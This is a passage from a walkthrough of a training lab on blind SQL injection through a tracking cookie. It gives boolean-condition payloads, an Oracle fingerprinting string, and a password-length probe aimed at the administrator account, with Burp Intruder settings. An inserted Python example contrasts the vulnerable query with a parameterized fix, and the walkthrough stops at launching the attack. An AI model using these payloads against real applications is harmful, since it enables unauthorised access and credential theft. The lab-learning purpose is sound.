INFO LAB: →

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and no error messages are displayed. But the application includes a "Welcome back" message in the page if the query returns any rows.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

GOAL : → To solve the lab, log in as the administrator user.


Solution : →

  1. First, we need to know how we will complete this lab.

    We will inject into the Cookie header:

    Cookie: TrackingId=pQFLBmaWHcVOPCwl; session=nnp3cylRBFgQfY7em49IpAaoeAEgc18M
    
    
  2. Let's add a single quote and check whether the response contains 'Welcome back'.

    Then we look at the response and try these payloads:

    ' AND '1'='1  >> this gives us 200 OK and the Welcome back message
    ' AND '1'='2  >> this gives us 200 OK, but we don't see Welcome back
    

So now we know where the injection point is.
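Why the two payloads above give different responses, and what removes the difference, as an added example (not code from the lab or from this write-up). It assumes a query shape, the hypothetical table `tracked_user` with column `tracking_id`, and SQLite standing in for the lab's database.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tracked_user (tracking_id TEXT)")
    db.execute("INSERT INTO tracked_user VALUES ('pQFLBmaWHcVOPCwl')")
    return db

def welcome_vulnerable(db, tracking_id):
    # The cookie value is concatenated into the SQL text, so a quote in the
    # cookie ends the string literal and the rest is parsed as SQL.
    query = ("SELECT tracking_id FROM tracked_user "
             "WHERE tracking_id = '" + tracking_id + "'")
    try:
        return db.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False  # like the lab: no error message, just no "Welcome back"

def welcome_hardened(db, tracking_id):
    # The cookie value is bound as a parameter: it is only ever compared as
    # data, so the quote and the AND clause are part of the looked-up string.
    query = "SELECT tracking_id FROM tracked_user WHERE tracking_id = ?"
    return db.execute(query, (tracking_id,)).fetchone() is not None

def compare(db, cookie):
    """Return (vulnerable shows Welcome back, hardened shows Welcome back)."""
    return welcome_vulnerable(db, cookie), welcome_hardened(db, cookie)

if __name__ == "__main__":
    db = make_db()
    base = "pQFLBmaWHcVOPCwl"
    for cookie in (base, base + "' AND '1'='1", base + "' AND '1'='2"):
        vulnerable, hardened = compare(db, cookie)
        print(f"{cookie!r:35} vulnerable={vulnerable} hardened={hardened}")
```

With the parameterized query, both tampered cookies produce the same response as any unknown tracking ID, so the page no longer leaks a true/false answer.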

  1. We need to know the type of database:

    ' || (SELECT '' FROM dual) || ' >> 200 OK >> Oracle database

Here we go. Let's find the length of the password.

Choose the Sniper attack type.

    ' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
    # I will send it to Intruder and mark the 1 as the payload position: §1§

Choose payload type → Numbers

From: → 0

To: → 50. I think it will be less than this number, but let's try.

Go to Settings >> choose Grep-Extract >> Add >> search for Welcome back and select it

Press Start attack.